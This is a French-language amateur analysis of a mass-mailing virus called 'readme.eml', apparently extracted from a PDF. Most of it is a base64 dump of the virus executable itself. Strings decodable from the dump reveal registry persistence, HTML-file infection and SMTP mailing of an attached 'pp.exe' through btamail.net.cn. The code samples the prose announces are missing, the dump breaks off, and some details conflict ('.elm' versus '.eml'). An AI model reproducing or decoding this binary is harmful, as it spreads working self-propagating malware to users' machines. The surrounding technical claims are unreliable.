virus readme eml

publicité
Le Virus « readme.eml »
désormais dompté
(Sécurité Informatique)
J.B. Dadet DIASOLUKA Luyalu Nzoyifuanga
+243 - 851278216 - 899508675 - 995624714 - 902263541 - 813572818
La dernière révision de ce texte est disponible sur CD.
Il existe en circulation et donc aussi sur le .Net (Internet) un virus très sauvage, démoniaque, très malintentionné qui s’assigne de détruire tous les fichiers «.html» ou «.htm» et donc à paralyser l’Internet. Ces fichiers sont en effet les plus utilisés sur l’Internet (bien sûr avec les fichiers «.psp», «.asp» et
autres...) donc ça fait partie du moteur ou même des poumons de l’Internet.
Je ne connais pas le nom de ce virus, mais ça doit être le suivant :
Je suis bien heureusement arrivé à le repérer sur disque et à comprendre tant
soit peu (pas mieux que les professionnels en la matière bien entendu), son
comportement, et ses intentions :
1. Saturer les supports d’information (disques durs, mémoires électroniques
[flash disk, cartes mémoires, SD,... ] ;
Le Virus « readme.eml » désormais dompté
2. Faire supprimer les fichiers [infectés] par les anti-virus, donc vous faire
perdre le travail et le temps investi sur lui ;
3. Peut-être aussi saturer la bande passante ;
4. Bouffer les mégas disponibles pour l’Internet...
1. Saturer les supports d’information :
À intervalle régulier, il parcourt les fichiers «.html» ou «.html» et leur ajoute, à
la fin, le contenu suivant (une seule ligne à la fois) :
Chaque ligne comporte 237 caractères donc au moins 237 bytes. Rien que
dans le fichier ci-dessus, il occupe donc [au moment de l’interception] au
moins 9 × 237 = 2'133 octets (2,0830078125 kB). Si 10'000'000 fichiers sont
ainsi infestés, ce code occupera 21’330’000'000 (208’30’078,125 kB =
20’341,87 MB = 19,87 GB = 0,019 TB).
Vous pouvez lire ce code à la fin d’un fichier «.html» infecté que vous devez
lire avec un éditeur de texte. Je crois que si vous chargez un fichier de ce
genre dans un navigateur une grande catastrophe, un grande cataclysme
pourrait s’en suivre, l’ouverture en cascade de plusieurs fenêtres
«readme.elm», invisible à l’écran (top=left=6’000), mais surchargeant la mémoire RAM de l’ordinateur, et ralentissant aussi tant soit peu mais doublement la machine) :
2. Faire supprimer les fichiers [infectés] par les anti-virus ;
Les grands antivirus mis-à-jour reconnaissent les
fichiers infestés, mais au lieu de supprimer seulement le code malveillant dans le fichier (nettoyer
le fichier infesté), ils effacent tous les fichiers infestés (même les fichiers primordiaux/indispensables) et ne les mettent même
pas en quarantaine pour une désinfection manuelle.
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 2/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
3. et 4. : Saturer la bande passante et bouffer les mégas destinés à la navigation Internet :
LE FICHIER «README.ELM» :
C’est un fichier qui est vraisemblablement automatiquement envoyé à autant
de destinataires qu’il veut, un «dialer ?»
L’entête du fichier «readme.elm» comprend le message suivant :
Comme on peut le deviner dans ce code, le virus envoie à votre insu et à tous
les destinataires qu’il peut, le message, avec comme e-mail source le nom de
votre [email protected], et l’ID «I miss you» suivi d’un nom de serveur
probablement factice ([email protected]) :
Le sujet du message :
Si vous voyez donc un message comportant ce genre de sujet, ne l’ouvrez pas
et surtout effacez-le directement à défaut de le signaler à qui de droit.
l’intégralité de ce fichier «readme.elm» qui probablement est envoyé par dialing automatique, est comme suit, toujours le même dans tous les répertoires
qu’il infecte.
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 3/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAwE+W4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4f
tAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAFBFAABMAQQAtSzvggAAAAAAAAAA4ACOgQsBAhkAAgAAAAYAAAAAAAAARAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAA
AMACgAAAAAAALAAAAAEAADq3gAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAABAAAAAC
AAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8bQAAAEAAAAAeAAAADAAAAAAAAAAAAAAAAAAAYAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAw/8lMDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 4/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAACgwAAAAAAAAAAAAADgwAAAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGMAAAAAAAAEYwAAAAAAAAS0VSTkVMMzIuZGxsAAAAAFNsZWVwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAwAAAADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG
Do5hkAAIt0JCDoCAAAAGFoABBAAMPpWegBFgAAgeYA8P//ge4AEAAAZoE+TVp18w+3fjwD/otveAPui1
0gA94zwIvWg8MEQIs7A/roDwAAAEdldFByb2NBZGRyZXNzAF4zybEP/POmddqL8otdJAPeD7cMQ4tdHA
PeixyLA96B7PwAAACL/Im0JOAAAADoXgQAAIvpVv/T/KuLzeL1iwQk6AsAAABVU0VSMzIuRExMAP/Qi/DoywY
AAIvpVv/T/KuLzeL1iwQk6A0AAABBRFZBUEkzMi5ETEwA/9CL8OgdBwAAi+lW/9P8q4vN4vWLBCToCAA
AAE1QUi5ETEwA/9CL8OhcBwAAi+lW/9P8q4vN4vWLBCToDAAAAFdTT0NLMzIuRExMAP/Qi/DofAcAAIv
pVv/T/KuLzeL1i/ToEAAAAENoaW5lc2VIYWNrZXItMgBqAGoA/1YE/1YIC8B0Aszp/1YMagFQ/1YQ6Gg
BAACL9OgNAAAAi/RoYOoAAP9WROvv6VnolRQAAOglCgAAjYIeAQAAiQLoDAoAAI1CLZCQkIkC6GEIAAD
o+gkAAI1CO5CQkIkC6HYIAADo9AkAAI2ClwAAAIkC6NsJAACNQi2QkJCJAugwCAAA6MkJAACNQjuQkJC
JAuhFCAAAi4boAAAAaGDqAABQ/1Zkg/j/dFxW6EoAAABe6DsAAABOZXQgU2VuZCAqIE15IGdvZCEgU29tZS
BvbmUga2lsbGVkIENoaW5lc2VIYWNrZXItMiBNb25pdG9yAFhqAFD/VhDrnFnoyRMAAOhaAQAA6egAAAAAX4u
GjAAAAImH/RUAAIuGlAAAAImHERYAAIuGmAAAAImHJhYAAItGRImHZhYAAI2HvBUAAFBUagBQUGoAagD
/VnSL2FiLhugAAABoYOoAAFD/VmRQagBT/1Z4WIP4/3QCzOlW6AMAAABe69lZ6E0TAADo3gAAAOlZ6EE
TAACB7AABAABU6OwGAACL/GoQV/9WcIP4/3Qdi9johRMAAGoAagBT/1Y8U+hjCwAAi/xqB1f/VihQVOg
uAAAAU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuAGgCAACA/5agAAA
AW4vE6AgAAABSdW5vbmNlAFloAAEAAFBqAWoAUVP/lqQAAADoAAAAAF+LhqgAAACJh4QVAACLhqQAAAC
Jh64VAACLhqwAAACJh5kVAACNh10VAABQVGoAU1BqAGoA/1Z0WDPAiYboAAAAgewAAQAAVOgNBgAA6AA
AAABfi0ZQiYd7FQAAi0ZkiYeXFQAAi0YQiYeyFQAAi0ZIC8B0b2oBagD/0IuW4AAAAA+3WjwD2ouLBAE
AAItrVCvNgfkAAgAAckgD6o2XchUAAGpOkJCQkFVS6GQVAACNTU6QkJCL1GgAAQAAUVLoUBUAAP9WTFBUagBQVWoAagD/V
lyJhugAAABYaPQBAAD/VkTM6WoAagD/lowAAABQVFD/logAAABqAGj/Dx8A/1ZQC8B0b4vYakBoABAAA
GgAAgAAagBT/1ZoC8B0S4vojZdyFQAAUFRqTpCQkJBSVVP/VlRYg/hOkJCQdSyL1I1NTpCQkFBUaAABAABSU
VP/VlT/VkxUagBQVWoAagBT/1ZYiYboAAAAWFP/VmBo9AEAAP9WRMzpWIvM6A4AAABHZXRTeXN0ZW1Ua
W1lAOgRAAAAR2V0Q29tcHV0ZXJOYW1lQQDoFAAAAFdpZGVDaGFyVG9NdWx0aUJ5dGUA6BAAAABUZXJta
W5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdGVtRGlyZ
WN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb
3NlSGFuZGxlAOgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTA
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 5/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
AAAV3JpdGVQcm9jZXNzTWVtb3J5AOgMAAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc
0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFNsZWVwAOgIAAAAX2xjbG9zZQDoCAAAA
F9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2V0RmlsZVRpb
WUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBA
OgPAAAARmluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6A
gAAABXaW5FeGVjAOgQAAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYX
RlTXV0ZXhBAOgNAAAATG9hZExpYnJhcnlBACvMwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW
5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQDoDAAAAEZpbmRXaW5kb3dBAO
gZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDaGFuZ2
VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ0
9wZW5LZXlBACvMwekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZU
EA6A4AAABXTmV0T3BlbkVudW1BACvMwekC/+DpWIvM6AUAAAByZWN2AOgMAAAAY2xvc2Vzb2NrZXQA6A
cAAABzb2NrZXQA6AgAAABjb25uZWN0AOgOAAAAZ2V0aG9zdGJ5bmFtZQDoBgAAAGh0b25zAOgFAAAAc2
VuZADoCwAAAFdTQUNsZWFudXAA6AsAAABXU0FTdGFydHVwACvMwekC/+DpWIvM6AwAAADHubHQwO666da+IQDoEAAAAMily/vC6L
XEt6jC1rmmIQDoEwAAALe0ttTQsL3MLLPnydC/xtGnIQDoDAAAALTytbmxvsCttcchAOgQAAAAz/LTot
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
Nz. Luyalu DIASOLUKA Jean-Dadet Baptiste
- 6/16 -
jeudi 22 août 2019 (1:53 PM)
Le Virus « readme.eml » désormais dompté
QIAAIv8agBQV1P/lsQAAABooA8AAP9WROgFAAAADQouDQpYagBqBVBT/5bEAAAAaKAPAAD/VkToBgAAAFF
VSVQNClhqAGoGUFP/lsQAAABooA8AAP9WRMdF+AEAAABT/5bYAAAA/5bAAAAAi2X8YYtF+MnCCADIBAAAYLgAAQAAK
+CL1FBUUv+WgAAAAFjoHQIAAEhFTE8gYnRhbWFpbC5uZXQuY24NCk1BSUwgRlJPTTogaW1pc3N5b3VAY
nRhbWFpbC5uZXQuY24NClJDUFQgVE86ICVzDQpEQVRBDQpGUk9NOiAlc0B5YWhvby5jb20NClRPOiAlc
w0KU1VCSkVDVDogJXMgaXMgY29tbWluZyENCk1JTUUtVmVyc2lvbjogMS4wDQpDb250ZW50LXR5cGU6I
G11bHRpcGFydC9taXhlZDsgYm91bmRhcnk9IiNCT1VOREFSWSMiDQoNCi0tI0JPVU5EQVJZIw0KQ29ud
GVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IHF1b3RlZC1wcmlud
GFibGUNCg0KPGh0bWw+PEhFQUQ+PC9IRUFEPjxib2R5IGJnQ29sb3I9M0QjZmZmZmZmPjxpZnJhbWUgc3JjP
TNEY2lkOlRIRS1DSUQgaGVpZ2h0PTNEMCB3aWR0aD0zRDA+PC9pZnJhbWU+PC9ib2R5PjwvaHRtbD4NC
g0KLS0jQk9VTkRBUlkjDQpNSU1FLVZlcnNpb246IDEuMA0KQ29udGVudC1UeXBlOiBhdWRpby94LXdhd
jsgbmFtZT0icHAuZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogYmFzZTY0DQpDb250ZW50L
WlkOiBUSEUtQ0lEDQoNCgBYi/xX/3UMV/91DFD/dQj/lpwAAACL54lF/IHEAAEAAGGLRfzJwggAyAQAAGDHRf
wAAAAA6EEAAABBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eH
l6MDEyMzQ1Njc4OSsvAF6LfRCLVQzB4gMz2zPAuQYAAADR4FP/dQjoMAAAAEp0DUPi74oEBvyq/0X869
5J0+CKBAb8qv9F/NHpAU38sD3886oywKphi0X8ycIMAMgAAABRUlaLdQiLTQyL0cHqA4oUFvbRgOEH0u
qA4gEKwl5aWcnCCABYUegDAAAA6zrpZGf/NgAAZGeJJgAA6BwAAAD/Moki/+DpWOgPAAAAiyKPAmRnjw
YAAFlZ/+Dp6AQAAABQ/hgAWsPpyAAAAOgIAAAA6NH/////4elZi0UQiYi4AAAAM8DJwhAA6GcBAABNWl
AAAQIAAwQAAQ8AAf//AAK4AAdAAAEaACIBAAK6EAABDh+0Cc0huAFMzSGQkFRoaXMgcHJvZ3JhbSBtdX
